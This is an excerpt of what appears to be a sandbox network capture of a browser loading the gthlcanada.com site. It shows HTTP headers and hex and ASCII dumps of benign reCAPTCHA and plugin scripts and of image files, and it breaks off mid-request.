                                                                                                                          X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wB
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                          2025-01-13 21:01:14 UTC749INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                          Expires: Mon, 13 Jan 2025 21:01:14 GMT
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:14 GMT
                                                                                                                          Cache-Control: private, max-age=300
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2025-01-13 21:01:14 UTC506INData Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                          Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                          2025-01-13 21:01:14 UTC935INData Raw: 28 27 6d 65 74 61 27 29 3b 6d 2e 68 74 74 70 45 71 75 69 76 3d 27 6f 72 69 67 69 6e 2d 74 72 69 61 6c 27 3b 6d 2e 63 6f 6e 74 65 6e 74 3d 27 41 2f 6b 61 72 67 54 46 79 6b 38 4d 52 35 75 65 72 61 76 63 7a 65 66 2f 77 49 6c 54 6b 62 56 6b 31 71 58 51 65 73 70 33 39 6e 56 2b 78 4e 45 43 50 64 4c 42 56 65 59 66 66 78 72 4d 38 54 6d 5a 54 36 52 41 72 57 47 51 56 43 4a 30 4c 52 69 76 44 37 67 6c 63 41 55 41 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c
                                                                                                                          Data Ascii: ('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJl
                                                                                                                          2025-01-13 21:01:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.11.2049811137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC619OUTGET /app/plugins/latest_news/public/js/latest-news-public.js?ver=1.0.0 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:14 UTC518INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:14 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 838
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961677551 961417546
                                                                                                                          Age: 80
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-346"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:14 UTC838INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 20 24 20 29 20 7b 0a 09 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 09 2f 2a 2a 0a 09 20 2a 20 41 6c 6c 20 6f 66 20 74 68 65 20 63 6f 64 65 20 66 6f 72 20 79 6f 75 72 20 70 75 62 6c 69 63 2d 66 61 63 69 6e 67 20 4a 61 76 61 53 63 72 69 70 74 20 73 6f 75 72 63 65 0a 09 20 2a 20 73 68 6f 75 6c 64 20 72 65 73 69 64 65 20 69 6e 20 74 68 69 73 20 66 69 6c 65 2e 0a 09 20 2a 0a 09 20 2a 20 4e 6f 74 65 3a 20 49 74 20 68 61 73 20 62 65 65 6e 20 61 73 73 75 6d 65 64 20 79 6f 75 20 77 69 6c 6c 20 77 72 69 74 65 20 6a 51 75 65 72 79 20 63 6f 64 65 20 68 65 72 65 2c 20 73 6f 20 74 68 65 0a 09 20 2a 20 24 20 66 75 6e 63 74 69 6f 6e 20 72 65 66 65 72 65 6e 63 65 20 68 61 73 20 62 65 65 6e 20 70 72 65 70 61 72 65 64 20 66 6f 72 20 75 73 61
                                                                                                                          Data Ascii: (function( $ ) {'use strict';/** * All of the code for your public-facing JavaScript source * should reside in this file. * * Note: It has been assumed you will write jQuery code here, so the * $ function reference has been prepared for usa


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.11.2049812137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC639OUTGET /app/plugins/tagged_content_blocks/public/js/tagged-content-blocks-public.js?ver=1.0.0 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:14 UTC519INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:14 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 838
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961417814 961417477
                                                                                                                          Age: 115
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-346"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:14 UTC838INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 20 24 20 29 20 7b 0a 09 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 09 2f 2a 2a 0a 09 20 2a 20 41 6c 6c 20 6f 66 20 74 68 65 20 63 6f 64 65 20 66 6f 72 20 79 6f 75 72 20 70 75 62 6c 69 63 2d 66 61 63 69 6e 67 20 4a 61 76 61 53 63 72 69 70 74 20 73 6f 75 72 63 65 0a 09 20 2a 20 73 68 6f 75 6c 64 20 72 65 73 69 64 65 20 69 6e 20 74 68 69 73 20 66 69 6c 65 2e 0a 09 20 2a 0a 09 20 2a 20 4e 6f 74 65 3a 20 49 74 20 68 61 73 20 62 65 65 6e 20 61 73 73 75 6d 65 64 20 79 6f 75 20 77 69 6c 6c 20 77 72 69 74 65 20 6a 51 75 65 72 79 20 63 6f 64 65 20 68 65 72 65 2c 20 73 6f 20 74 68 65 0a 09 20 2a 20 24 20 66 75 6e 63 74 69 6f 6e 20 72 65 66 65 72 65 6e 63 65 20 68 61 73 20 62 65 65 6e 20 70 72 65 70 61 72 65 64 20 66 6f 72 20 75 73 61
                                                                                                                          Data Ascii: (function( $ ) {'use strict';/** * All of the code for your public-facing JavaScript source * should reside in this file. * * Note: It has been assumed you will write jQuery code here, so the * $ function reference has been prepared for usa


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.11.204981354.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC417OUTGET /app/uploads/gthl/2024/08/29093928/icons8-facebook-48-1.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:14 UTC484INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 889
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:15 GMT
                                                                                                                          Last-Modified: Thu, 29 Aug 2024 13:39:29 GMT
                                                                                                                          ETag: "ceda85dc6354796fd08c69a2032d2b29"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 67711c5cba0352ee130f60f6cc103e0a.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: mu5zIfeg2DNUdnwuvEQgSbOYdCP7IarRCJAbHkJALY9W7-LvK03F2A==
                                                                                                                          2025-01-13 21:01:14 UTC889INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 2b 49 44 41 54 78 9c ed 99 cf 4f 13 41 14 c7 37 33 34 31 01 e2 c5 a3 27 23 68 c4 e0 c9 ab ff 80 3f a2 47 a3 de bd 28 02 7f 80 89 89 1e f4 86 24 a4 33 45 0c 09 11 aa 89 07 2f 86 c4 13 31 5e 94 8a 80 24 fe 48 0c fb de b6 b5 d0 02 15 d2 b2 b4 63 a6 56 0c 6e 81 9d 9d dd 2d 87 fd 26 ef d4 cd ec f7 33 f3 e6 cd ec ab 61 44 8a 14 29 92 54 6c d8 3c 43 18 f4 51 86 49 c2 70 86 72 cc 53 8e 9b f5 c8 13 86 1f 6b bf 71 b3 57 3e 6b 1c 08 25 72 ed 84 43 3f 65 f0 99 72 14 4a c1 60 5e 02 1b 83 d9 b6 f0 8d df 15 2d 72 26 29 c3 65 65 e3 0e 10 5c 22 0c ef c8 31 c3 31 1f c7 93 84 63 4a db f8 7f 41 18 4e 1b 09
                                                                                                                          Data Ascii: PNGIHDR00WpHYs+IDATxOA7341'#h?G($3E/1^$HcVn-&3aD)Tl<CQIprSkqW>k%rC?erJ`^-r&)ee\"11cJAN


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.11.204981454.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC653OUTGET /app/uploads/gthl/2024/08/29093928/icons8-instagram-48-1.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:14 UTC485INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 2698
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:15 GMT
                                                                                                                          Last-Modified: Thu, 29 Aug 2024 13:39:29 GMT
                                                                                                                          ETag: "b3c9ce60dd1d75ed3f597202c82c05e7"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 d01a0cfc47d6e412dd81c986ff5d69da.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: B3x-njurGHRoxS6VslHd08aYGow4Tkn2ts74MIEj009oUkrnGlnBAQ==
                                                                                                                          2025-01-13 21:01:14 UTC2698INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 3c 49 44 41 54 78 9c ed 98 0b 54 55 65 16 c7 0f a8 90 8a af 1a 94 7b c9 07 88 89 1a 60 8a 4e 3a b5 7c 2b 92 02 8a 0f 90 67 12 58 4d 56 a6 93 33 d9 0c a9 65 2f cd 14 35 b5 7c 35 4e 3a 2a 56 4a 4b f3 51 1a 3e 52 2b 35 44 f1 81 20 f9 04 7c 00 17 b8 3c ee fd cd 3a df 77 ee b9 e2 63 c6 8b ce 9a 35 6b b1 d7 da 6b 5d ee 77 ce de ff df b7 f7 b7 cf e1 2a 4a 9d d5 59 9d d5 d9 ff 8d 05 f9 e0 1a d4 b1 78 d4 e0 2e a6 af 07 f9 95 96 07 75 36 59 87 fa 9a b8 57 1f e4 5f 46 9f 27 cd f4 ea 57 49 f7 60 0b 5d 43 ad 04 84 58 ca ba 86 58 72 02 42 2d 6b fc 43 19 db 79 34 2e ff 15 f1 43 3b 95 86 05 f9 96 64 df
                                                                                                                          Data Ascii: PNGIHDR00WpHYs<IDATxTUe{`N:|+gXMV3e/5|5N:*VJKQ>R+5D |<:wc5kk]w*JYx.u6YW_F'WI`]CXXrB-kCy4.C;d


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.11.204981554.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC430OUTGET /app/uploads/gthl/2019/09/05144420/GTHL_Header17-G-1024x200-1024x200.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:14 UTC456INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 64482
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:14 GMT
                                                                                                                          Last-Modified: Thu, 05 Sep 2019 18:44:21 GMT
                                                                                                                          ETag: "02b9b75e50891266abdbb5c111155a82"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                          Via: 1.1 929cbb64d024a9973633b197e2a23482.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 1kMA4vYTxmKbDA5aMJmoOWQLqVnqUOVlsoBLN74WYmm3ju1PzmgU4Q==
                                                                                                                          Age: 1
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff e1 03 c0 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c
                                                                                                                          Data Ascii: JFIFExifII*http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xml
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: cc 44 90 27 5e bb 58 3c d1 8e f1 7e 3b 62 a1 cc 37 89 fd cd e6 c2 73 b6 ef bb a0 87 26 7c 41 40 78 b5 9d 64 ed e5 60 cf 50 dd 3b 31 98 80 89 9d 34 8d a4 88 d7 fa 7c 6c 04 5a 59 65 01 29 81 2a 12 76 3d 0e fa 8d 3d 7a 58 0e e2 d9 0e 2b 32 a1 26 11 94 28 42 81 03 7f a6 be 56 04 50 ca 54 d1 fd 59 52 75 30 10 75 d4 98 d6 7c bf 8d 81 10 cb 4c 23 40 24 19 1b ab 28 93 fc be 23 5b 03 85 b3 cd cb e0 2e 2f 30 ca 12 88 d3 5e c7 5d 63 e5 d6 c0 d5 34 c6 32 bb 2d 94 93 25 49 00 81 fc 37 fb d2 c0 91 4b 28 77 31 92 46 b0 54 35 d8 cc 8d 36 8f 89 b0 0a 92 da 64 8d 73 1c c0 2c 44 a7 42 75 f8 58 08 84 a5 12 94 b5 39 c9 50 2e 4e 83 49 1d 35 db a5 83 b3 32 15 05 29 49 31 f8 67 51 f1 df f9 d8 13 71 6a 44 03 32 54 08 db 7d 35 90 24 fd ef 60 e3 f8 a5 29 3a 7e d0 98 1e 9d c7 4e f6
                                                                                                                          Data Ascii: D'^X<~;b7s&|A@xd`P;14|lZYe)*v==zX+2&(BVPTYRu0u|L#@$(#[./0^]c42-%I7K(w1FT56ds,DBuX9P.NI52)I1gQqjD2T}5$`):~N
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: c1 03 30 1d 41 25 3a 79 eb 6c f7 1a 4d 1a 63 9e 13 70 f7 3b f7 9b 7c 52 a2 a6 5a ff 00 e2 95 74 ba 52 e2 f7 fc 41 66 09 f4 b4 9d f7 d2 c2 8b 47 c3 3a 43 c3 cb 9b 1c 5e 18 80 d1 51 d7 df 89 ba 2a 1b 34 65 cf 75 6c 85 29 4f c8 54 af 28 44 e4 09 04 f7 b6 22 e3 43 c0 fc 05 78 e1 bb cf 13 52 f1 70 b9 74 dd 4e 36 dd 5d 40 c3 8f a7 94 a5 a8 25 23 29 5e 63 25 40 78 41 89 d6 c1 1b 84 f8 3f 86 71 85 f7 7f d3 dd 7c 40 43 97 25 cd 77 8b c1 db d5 57 3b 89 05 22 73 8e 52 96 14 32 80 75 d6 63 41 60 69 88 f8 7b c3 bb ae e4 ac ad bb 38 b5 4b 7b d7 32 d9 53 34 49 ba 1c 64 be 67 f0 e6 2b 20 6e 7a 58 2b dc 32 c0 57 87 13 b1 63 17 05 da eb 54 ea 5b 6b 75 d7 dd 49 29 65 09 1a 98 1b ee 00 1d c8 f5 b0 5f e8 78 3d c3 eb da f2 66 e8 bb b8 cf 43 53 5f 52 e0 a7 a7 67 f4 3b 89 4b ae
                                                                                                                          Data Ascii: 0A%:ylMcp;|RZtRAfG:C^Q*4eul)OT(D"CxRptN6]@%#)^c%@xA?q|@C%wW;"sR2ucA`i{8K{2S4Idg+ nzX+2WcT[kuI)e_x=fCS_Rg;K
                                                                                                                          2025-01-13 21:01:14 UTC14808INData Raw: 34 9c ef 59 9e b0 8d 23 13 dc fc 09 c5 f7 b3 b7 d5 ff 00 5d 84 ab 2b 5d 4a 43 95 0b bd 90 82 a0 91 02 72 b8 06 80 01 27 a0 16 c3 52 a5 ea 38 bb c2 6e 18 61 44 52 5d 57 f5 ce e5 1d 13 6a 14 d7 7d d3 50 9a 95 a8 92 4e 51 94 98 25 44 99 51 1b c9 36 83 27 f6 5d e2 25 c8 de 21 e2 0d f5 89 2f bb a6 e6 76 f8 ab a7 ab 4a 2b 6b 1b 64 29 4a 5d 42 96 13 9c 89 82 b1 31 dc 77 b0 56 7d a6 71 dd 3f fa 5e b8 f1 26 0f bf e8 6a dd bb ee c6 0b 75 74 15 08 7d 0d ba 97 df 39 49 49 22 61 42 52 77 0a d4 41 b0 7a 13 00 71 f3 05 62 cc 31 47 79 de 58 8a e5 b9 6f 05 24 26 aa 8a b2 b5 b6 54 d3 a3 7c a1 64 12 93 b8 3d 8e ba cd 83 c8 5c 79 bc 68 6f 9e 2e 62 3a eb b6 b2 9a ba 8d e7 db 28 a8 a6 75 2e 36 e0 0d 20 78 54 09 07 50 76 ed 60 d4 7d 8f 71 4e 1f c2 ff 00 da d1 7e df b7 55 d3 ef
                                                                                                                          Data Ascii: 4Y#]+]JCr'R8naDR]Wj}PNQ%DQ6']%!/vJ+kd)J]B1wV}q?^&jut}9II"aBRwAzqb1GyXo$&T|d=\yho.b:(u.6 xTPv`}qN~U
                                                                                                                          2025-01-13 21:01:14 UTC522INData Raw: e7 6f 5f a5 80 e8 56 50 52 af d6 25 62 64 eb af 6b 02 a9 40 3f b6 42 7f 79 eb 60 13 cf 0b fd 53 85 44 e8 4e d6 05 06 78 d4 28 79 f4 36 05 d2 89 39 4a 41 91 a1 03 f7 d8 38 66 2a d8 15 0f 3d 22 c0 2f 95 42 9c 03 f0 e8 60 83 f2 f9 58 0a 2a 5d 6d 12 48 48 1a 90 51 b8 b0 2b cd 75 64 38 10 fa 63 f6 87 e1 3e 66 c0 ec 38 a5 94 2d 4f b4 08 81 d4 fa 0d 34 b0 1b c4 c9 43 a9 53 8a d4 7e 0d 07 df ad 81 23 4c 87 5d e6 28 b2 95 1f 14 a9 79 89 f8 0b 02 8f 5e 4d 34 32 d4 a6 4c 40 e5 89 0a db 53 d6 c0 bb 75 cd 7b b3 6b a4 09 6d c5 1f 1a d6 b2 9d 27 a4 fd e9 60 0b ca 8d 2d ca d9 79 0e 95 80 34 00 e5 24 6c 6c 11 eb 43 8c c3 61 23 4d 40 df 37 9c 58 13 66 a8 9c c0 11 23 52 95 69 af 91 b0 26 6b 14 09 3e ea 0c 48 cc 0c 47 9c d8 10 05 fa 85 64 51 89 d3 c3 3f 66 c0 fa 9d b0 9a 70
                                                                                                                          Data Ascii: o_VPR%bdk@?By`SDNx(y69JA8f*="/B`X*]mHHQ+ud8c>f8-O4CS~#L](y^M42L@Su{km'`-y4$llCa#M@7Xf#Ri&k>HGdQ?fp


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.11.2049818137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC607OUTGET /app/themes/base/bower_components/lodash/lodash.min.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
